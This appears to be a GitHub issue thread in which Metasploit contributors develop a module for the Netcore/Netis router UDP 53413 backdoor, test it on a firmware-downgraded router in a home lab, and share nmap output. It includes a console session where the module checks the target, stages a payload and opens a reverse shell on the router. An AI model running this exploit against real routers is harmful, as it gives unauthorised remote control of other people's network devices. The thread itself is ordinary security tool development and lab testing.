Closed nixawk closed 8 years ago
Edit: Just purchased a WF2414, will be here Tuesday. I volunteer to get this module done.
@h00die is your router produced by netcore/netdis ?
Device should be in next week. In the meantime, i've started the module here: https://github.com/h00die/metasploit-framework/commit/713a061bffea6efc35fe49ce9d82dc1d0d73d1a1 The TrendMicro post says there is a hardcoded password in the firmware, haven't found a site that has what the password is. Anyone want to find that?
https://www.exploit-db.com/exploits/38470/ may contain one of the creds
for WF2414, looks like netis(WF2414)-V1.4.29433 is the patched version, netis(WF2414)-V1.4.27001 should be vulnerable, and is available.
@h00die I've created a module as follow.
msf exploit(netcore_udp_53413_backdoor) > info
Name: Netcore Udp 53413 Backdoor
Module: exploit/linux/misc/netcore_udp_53413_backdoor
Platform:
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2014-08-25
Provided by:
Nixawk
Available targets:
Id Name
-- ----
0 MIPS Little Endian
1 MIPS Big Endian
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.1 yes The target address
RPORT 53413 yes The target port
TIMEOUT 1000 yes The socket connect timeout in milliseconds
Payload information:
Description:
Routers manufactured by Netcore, a popular brand for networking
equipment in China, have a wide-open backdoor that can be fairly
easily exploited by attackers. These products are also sold under
the Netis brand name outside of China. This backdoor allows
cybercriminals to easily run arbitrary code on these routers,
rendering it vulnerable as a security device.
References:
https://www.seebug.org/vuldb/ssvid-90227
http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/
msf exploit(netcore_udp_53413_backdoor) > show options
Module options (exploit/linux/misc/netcore_udp_53413_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 53413 yes The target port
TIMEOUT 1000 yes The socket connect timeout in milliseconds
Exploit target:
Id Name
-- ----
0 MIPS Little Endian
msf exploit(netcore_udp_53413_backdoor) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(netcore_udp_53413_backdoor) > check
[+] The target is vulnerable.
msf exploit(netcore_udp_53413_backdoor) > run
[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Exploiting...
[*] Command Stager progress - 12.54% done (196/1563 bytes)
[*] Command Stager progress - 25.08% done (392/1563 bytes)
[*] Command Stager progress - 37.62% done (588/1563 bytes)
[*] Command Stager progress - 50.16% done (784/1563 bytes)
[*] Command Stager progress - 62.70% done (980/1563 bytes)
[*] Command Stager progress - 75.24% done (1176/1563 bytes)
[*] Command Stager progress - 87.78% done (1372/1563 bytes)
[*] Command Stager progress - 100.00% done (1563/1563 bytes)
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:54180) at 2016-05-16 00:52:43 -0500
pwd
/
ls
bin
cfg
dev
etc
lib
linuxrc
log
proc
sbin
sh
sys
tmp
usr
var
web
Source code?
I'll make the code clear and give a module pr.
Wifi router is in, WF2414. Downgraded to Netis(WF2414)-V1.4.27001,2014.05.07 16:10
Ran nmap to verify the downgrade is vuln:
h00die@kali:~# nmap -sV -sU -p 53413 192.168.1.1
Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-18 21:11 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0023s latency).
PORT STATE SERVICE VERSION
53413/udp open xdmcp XDMCP (unwilling; status: .Login:)
MAC Address: 04:8D:38:XX:XX:XX (Netcore Technology)
which is exactly what it says on the disclosure, so it looks solid.
This appears to be resolved.
http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/ https://www.seebug.org/vuldb/ssvid-90227
I will try to add a new module to exploit the backdoor.